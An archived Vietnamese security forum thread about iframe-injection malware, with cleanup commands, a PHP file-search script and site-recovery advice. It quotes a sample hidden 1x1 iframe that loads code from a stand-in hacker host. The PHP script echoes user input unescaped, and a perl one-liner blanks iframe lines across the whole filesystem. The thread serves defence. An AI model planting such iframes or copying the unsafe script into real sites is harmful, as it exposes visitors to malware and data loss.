PDA

View Full Version : Virus IFRAME lây lan mã độc !



vô danh
06-04-2010, 11:59 PM
Năm nay chứng kiến sự gia tăng đột biến của các trang web hợp pháp bị chèn các loại “iframe” hay còn gọi là mã độc hại .
Rất nhiều trang web nỗi tiếng đã bị tin tặc tấn công ,chúng đã chỉnh sữa nội dung các trang web index và defautl ,thêm vào một đoạn code ở giữa đầu hoặc cuối trang web nhằm mục đích lây lan cho các người dùng truy cập website .Khi người duyệt web truy cập vào trang web bị nhiễm ,một kết nối vô hình được thành lập đến một máy chủ của tin tặc cố gắng cài đặt phần mềm độc hại trên máy tính của người dùng.Ý định của những kẻ này là có thể tạo ra thư rác, hoặc có thể là một cái gì đó nham hiểm hơn, chẳng hạn như ăn cắp thông tin cá nhân như tài khoản ngân hàng hay thẻ tín dụng.
Cách mà Iframe tấn công !?
1- FTP : Iframe được chèn vào các tập tin trang web thông qua đường FTP,Thông thường, những người dùng bao gồm (nhà phát triển, quản trị web, vv) đã lưu các mật khẩu ftp trong các chương trình FTP client của họ (Cute FTP, filezilla,total commander vv). Trong trường hợp này, nếu hệ thống đó bị nhiễm virus hoặc phần mềm độc hại bất kỳ ,mật khẩu ftp lưu sẽ được sao chép lại và gửi qua email cho các tin tặc (người tạo ra virus hoặc phần mềm độc hại để chúng có được các chi tiết của những trang web với tài khoản ftp). Một khi tin tặc lấy mật khẩu ftp, họ có hệ thống tự động(ct tin tặc code dùng chèn code) để chèn mã độc để các tập tin web site của victim thông qua chương trình FTP. Sau khi bị chèn iframe đến với trang web, khi người dùng truy cập trang web bị nhiễm hệ thống của họ cũng bị nhiễm phần mềm độc hại hoặc virus theo đó nó tiếp tục lây lan nếu người dùng này cũng có website riêng mình và pass FTP . Nếu người dùng đang sử dụng một chương trình chống virus tốt họ có thể có được một cảnh báo rằng các máy chủ bị nhiễm virus .
2-Javascript và SQL injection : Mình đã chứng kiến 1 chương trình dùng để flood attack đến site có lỗi XSS hay có lỗi code ,sau 15 p đã có thể chèn code vào site ,các file htm và html .Ngoài ra hacker có thể thông qua lỗi SQL injection lấy được pass db của bạn thông qua đó chèn code vào db cả win và linux đều có thể bị .Các ứng dụng mã nguồn mở vì source code public nên rất dễ bị tiêu biểu là joomla .Nên tránh cài đặt quá nhiều mod plugin không đáng tin cậy vì bản thân mã nguồn mở nguyên thủy không nhiều lỗi .Nên update các mã nguồn mở last version có thể .

Làm cách nào khi máy của bạn bị nhiễm virus này !?
Hiện tại vẫn chưa có chương trình diệt virus hiệu quả để diệt loại virus này,tuy nhiên Kaspersky,avast hay AVG pro là các trình virus nên chọn lựa vì nó có khả năng phát hiện và ngăn chặn khá nhiều ,ngay cả khi bạn truy cập website bị nhiễm virus .Tốt nhất là bạn nền cài đặt format lại ổ cứng và hệ điều hành của máy và các chương trình nghi ngờ lây nhiễm(dùng chượng trình crack ,download từ các nguồn không đáng tin cậy,ngay cả các ct FTP crack cũng là 1 nguyên nhân) .Ngoài ra nên enable firewall (vd firewall window có sẵn) chỉ mở các port cần thiết như web : 80 FTP: 21 v.v sau khi cài đặt lại OS ,Yêu cầu nhà quản trị server đổi pass FTP của mình(không cho bạn biết để theo dõi trong 1 tuần ,nếu không tiếp tục bị chèn là từ phía local bạn bị) hoặc tự mình đổi pass ở một máy trạm an toàn nếu bạn đảm bảo rằng mạng đã được diệt virus sạch sẽ
Những phương thức bảo mật có thể sử dụng để ngăn chặn dạng mã độc này !
Kể từ khi xảy ra cuộc tấn công mã độc thông qua mật khẩu FTP bị lộ từ phía người dùng .Điều chúng tôi lưu ý ngay đến là việc bảo mật giao thức FTP ngay từ máy chủ server .Thay vì dùng giao thức FTP bình thường ,người dùng có thể dùng SFTP (giao thức secure FTP) nó có thể giúp chúng ta tăng thêm 1 tầng bảo mật cho site .Ngoài ra cách hay nhất là chỉ cho phép người dùng truy xuất FTP từ các địa chỉ IP xác định .Cách này có thể dùng thông qua các phần mềm hoặc firewall phần cứng .Tuy nhiên các thiết bị phần cứng thường khá mắc tiền ,nên chúng ta nên ưu tiên dùng phần mềm để xử lý .Đối dịch vụ window FTP tích hợp trên IIS ,nhà quản trị có thể chặn toàn bộ IP kết nối chỉ cho phép các range IP được chứng thực .Đối với Linux có thể được thực hiện bằng cách sử dụng iptables (http://www.hellosystemadmin.com/restrict-ftp-access-using-iptables/). Các nhiệm vụ trên có thể được thực hiện bằng cách một quản trị viên server có quyền cao nhất và điều này sẽ không là một phương pháp nhanh chóng hiệu quả cao khi FTP usrs có địa chỉ IP động. Vì vậy, chúng ta cần phải suy nghĩ về việc tạo ra một số script (php, VB, shell) mà có thể được sử dụng bởi tất cả người dùng. Ví dụ trong một máy chủ Linux chúng ta có thể tạo ra một số kịch bản PHP mà sẽ sử dụng lệnh iptables để thêm ip của mình để tường lửa.Có thể nghĩ đến 1 loại thuật toán như sau
Tạo một cơ sở dữ liệu mysql với hai tables ‘users’ "và "rules". Bảng của người sử dụng bao gồm các Id khách hàng và mật khẩu. Và bảng thứ hai nên bao gồm CustomerID, IPAddress và Status (Bạn có thể thêm bất kỳ lĩnh vực khác theo sự thuận tiện của bạn). Bây giờ chúng tôi cần tạo một kịch bản php theo đó sẽ gọi lệnh iptables để thêm các rules tường lửa,1 rules có thể có dạng như sau
iptables -I INPUT -s XXX.XXX.XXX.XXX -d 0.0.0.0-p tcp -m tcp dport 21 -j ACCEPT
Trong lệnh trên, chúng ta có thể vượt qua tường lửa với địa chỉ IP và trạng thái với các biến php
Build Suphp .v.v

(vô danh)

vô danh
07-04-2010, 01:02 AM
If your blog has been infected by the HTML:Iframe-inf infection according to avast here are two scripts that can help you.

First What is the HTML:Iframe infection? – Its just a line of text that is inserted at the end of every index.php and/or index.htm in your website. Nothing to freak out about but you want to fix it. And Its probably due to wordpress not being secure.

Anyways, here iIf you know the time frame of when the virus ran then you could narrow the list of infected files even more by tweaking the find command.

Lets say you know it infected your website about 5 days ago.

Then you would modify the find command to search all files modified less than 10 days ago.

find / -type f -mtime -10 | xargs grep -l '<iframe' 2>/dev/null >infectedFileslists what you do : This is something you run on the commmand line
You will need to find infected files first.

find / -type f | xargs grep -l '<iframe' 2>/dev/null

or you could print out a list of files possibly comprimised.

by typing

find / -type f | xargs grep -l '<iframe' 2>/dev/null >infectedFileslist.txtThe first step is figuring out what is going on with your virus infection.

find / -type f -mtime -10 | xargs grep -l ‘<iframe’| xargs perl -pi -e ’s/^.*\<iframe.*$/ /g’

Here is an explanation of what the script does line by line so you can adjust per your situation.

find / -type f -mtime -10 – looks all files that were modified in the last 10 days ( you adjust as needed)

xargs grep -l ‘<iframe’ – of that list of files modified recently look for a line that says <iframe
xargs perl -pi -e ’s/^.*\<iframe.*$/ /g’ – search and replace that line with a blank space You can modify the script line by line to

vô danh
07-04-2010, 03:52 PM
Bạn tạo 1 đoạn scripts trên thư mục hosting của mình (đồng cấp với thư mục index)với một file clear.php trong đó code như sau

<?php

$filename = $_GET["s"];
$content_pattern = $_GET["c"];
echo "Searching for $content_pattern in ".$filename."</br>";

//define the path as relative
$path = ".";
$webpath ="Type your domain name here. Eg:http://www.diovo.com/";

//using the opendir function
$dir_handle = @opendir($path) or die("Unable to open $path");

echo "Directory Listing of $path<br/>";

list_dir($dir_handle,$path,$filename,$content_patt ern);

function list_dir($dir_handle,$path,$filename_pattern,$cont ent_pattern)
{
// print_r ($dir_handle);
echo "<ol>";
//running the while loop
while (false !== ($file = readdir($dir_handle))) {
$dir =$path.'/'.$file;
if(is_dir($dir) && $file != '.' && $file !='..' )
{
$handle = @opendir($dir) or die("undable to open file $file");
list_dir($handle, $dir, $filename_pattern, $content_pattern);
}elseif($file != '.' && $file !='..')
{
if(strcmp("$file", "$filename_pattern")==0){
echo "<li><a href='$webpath.$dir'>$webpath.$dir</a></li>";

$handle = @fopen($dir, "r");
if ($handle) {
while (!feof($handle)) {
$content = fgets($handle);
$test = stristr($content, $content_pattern);
echo $test;

}
fclose($handle);
}
}
}
}

echo "</ol>";

closedir($dir_handle);
}
?>

Sau đó bạn truy cập link

http://www.xxx.com/clean.php?s=index.php&c=iframe
Trong đó
xxx là domain bị nhiễm iframe của bạn
s= chỉ cho đoạn code file cần xóa (ở đây là file index.php)
c= Chỉ ra cần xóa gì (tất nhiên là iframe rồi)
Trong trường hợp này ,chúng ta cần xóa iframe trong file index.php .
bản quyền code là Niyaz PK ,có thể dùng cho cả default và .asp

canvu
28-04-2010, 11:24 AM
Bài viết hay qua'

hidenmagic
24-09-2010, 12:59 PM
QuanTriMang.com - Kỹ thuật tấn công theo kiểu IFrame Injection hiện vẫn đang là 1 dạng xâm nhập cơ bản và phổ biến nhất của mô hình Cross-Site Scripting – XSS. Bằng cách chèn vào các website động (ASP, PHP, CGI, JSP … ) những thẻ HTML hay những đoạn mã script nguy hiểm, trong đó những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML cơ bản. Nếu bạn phát hiện được có kẻ đang nhắm vào website của bạn bằng kỹ thuật này, không nên quá lo lắng. Sau đây là 1 số thao tác cần làm khi website lâm vào tình trạng này.

Ví dụ 1 đoãn mã độc hại thường được sử dụng để tấn công:
{xtypo_co****
<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
nội dung của đoạn mã độc
{/xtypo_co****
1. Thường xuyên bảo trì website trong 1 khoảng thời gian nhất định:

Các chuyên gia bảo mật khuyến cáo những người quản trị nên gỡ bỏ toàn bộ website xuống để tránh trường hợp trở thành tâm điểm phát tán mã độc. Và trong toàn bộ quá trình khắc phục, tiếp tục giữ tình trạng offline của website.

2. Thay đổi lại tất cả các mật khẩu:

Thoạt nghe có vẻ đơn giản, những rất nhiều người quản trị hình như không mấy để ý đến khâu cực kỳ quan trọng này. Sau khi bị tin tặc nhòm ngó, bạn nên đổi mới tất cả mật khẩu bao gồm tài khoản ftp, ssh, các tài khoản quản trị, cơ sở dữ liệu …

3. Lưu lại 1 bản của website để phân tích:

Để xác định rõ nguyên nhân và điểm yếu nào đã bị tin tặc khai thác, bạn cần lưu giữ lại 1 bản nguyên tình trạng lúc bị tấn công. Điều này rất có ích cho việc phân tích và ngăn chặn hiểm họa sau này, bạn nên lưu lại website dưới dạng file nén định dạng rar, zip hoặc gzip và lưu trữ tại 1 nơi an toàn. Lưu ý rằng không bao giờ được lưu file cách ly này trực tiếp trên server.

4. Thay thế toàn bộ website bằng 1 bản sao lưu hoàn toàn sạch sẽ:

Không nên quá dựa vào những nhà cung cấp dịch vụ host rằng họ sẽ sao lưu toàn bộ dữ liệu cho bạn. Rất nhiều bộ phận hỗ trợ kỹ thuật thường xuyên khẳng định rằng họ có tiến hánh sao lưu tự động theo lịch trình, nhưng không gì có thể chắc chắn bằng việc bạn tự làm, hơn nữa 2 phương án dự phòng bao giờ cũng tốt hơn 1 phương án.

5. Kiểm tra lại website và đăng tải trở lại:

Quá trình này nên tiến hành chu đáo để đảm bảo rằng toàn bộ website an toàn và không còn lỗi nữa, sau đó bạn có thể đăng tải website trở lại như trước.

6. Tìm hiểu về nguồn gốc của các cuộc tấn công:

Để đảm bảo rằng những cuộc tấn công sẽ không bao giờ lặp lại, những người quản trị nên tiến hành 1 cuộc kiểm tra, phân tích đầy đủ và chi tiết của cuộc tấn công đó. Do lỗi ở đâu ? Lỗ hổng an ninh hay ứng dụng web ? Hoặc do chế độ phân quyền bị sai lệnh, nhầm lẫn ? Có thể website bị nhiêm virus trực tiếp ngay từ server lưu trữ dữ liệu ? Tất cả đều phải được tìm hiểu và phân tích kỹ lưỡng. Nếu cần thiết, hãy nhờ đến chuyên gia an ninh của các hãng bảo mật hàng đầu thế giới như Kaspersky, BitDefender, Norton, Panda, Avira …

7. Áp dụng các biện pháp bảo mật phù hợp:

Mặc dù bạn đã khôi phục thành công website, nhưng không có gì đảm bảo chắc chắn rằng website của bạn sẽ không bị tấn công thêm lần nào nữa. Nếu lỗ hổng an ninh cũ chưa được khắc phục, có thể website của bạn lại bị tê liệt ngay trong tối nay. Dựa vào các kết quả phân tích thu được ở bước trên, bạn nên áp dụng các biện pháp an ninh phù hợp, nâng cấp server, cài đặt thêm chương trình bảo mật, nâng cấp toàn bộ ứng dụng web hoặc tiến hành sử dụng quy luật bảo mật hoàn toàn mới.

Dựa vào kinh nghiệm quản lý và thông tin thu thập, chúng tôi có thể đóng góp thêm 1 số lời khuyên và dự đoán khách quan về nguyên nhân như sau.

Các nguyên nhân dễ gặp phải:

- Website sử dụng dịch vụ host giá rẻ
- Dựa trên nền tảng phiên bản cũ của các ứng dụng mã nguồn mở, ví dụ như WordPress 1.0… vốn có khá nhiều lỗ hổng
- Quyền truy cập dữ liệu trên server được thiết lập không theo thứ tự nhất định, ví dụ quyền thao tác với dữ liệu ở mức 777 – đọc, ghi và thực thi
- Các thiếu sót của phần mềm ứng dụng
- Sử dụng FTP thay vì SFTP
- Không hạn chế IP đối với các tài khoản SSH và FTP

Một số thao tác đơn giản nhưng hữu ích:

- Thay đổi mật khẩu định kỳ, ví dụ 2 tuần hoặc 4 tuần 1 lần
- Luôn cập nhật các phiên bản ổn định của ứng dụng
- Thường xuyên “dọn dẹp” các thư mục chứa dữ liệu trên server, để ý nếu có những file lạ đột nhiên xuất hiện
- Các mức phân quyền được thiết lập chuẩn xác
- Thường xuyên trao đổi với các đơn vị, chuyên gia cung cấp dịch vụ bảo mật để nhận được lời khuyên tốt nhất.
T.Anh (theo ComputerUser)